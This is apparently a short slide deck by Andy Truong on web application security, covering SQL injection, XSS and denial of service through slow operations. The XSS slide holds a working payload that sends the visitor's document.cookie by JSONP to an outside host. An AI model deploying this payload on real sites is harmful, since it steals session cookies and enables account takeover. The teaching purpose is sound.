Web applciation

Security

ANDY TRUONG

Twitter: thehongtt

Email: andy at GO1.com.au

SQL Injection

XSS

<script>
jQuery.ajax({
    url: "http://security.php55.andy.p.go1.com.vn/xss.php",
    dataType: "jsonp",
    data: {cookie: window.document.cookie},
    success: function(response) {
        console.log( response );
    }
});
</script>
<?php (new Victim($_REQUEST))->save(); ?>

DDOS

Request to slow processes is not limited:

  • Password hashing
  • Image manipulation
  • Text processing (Markdown, URL replace, …)

 

Tools

Your
ideas

Web application security

By Andy Truong

Made with Slides.com

Web application security

  • 981

More from Andy Truong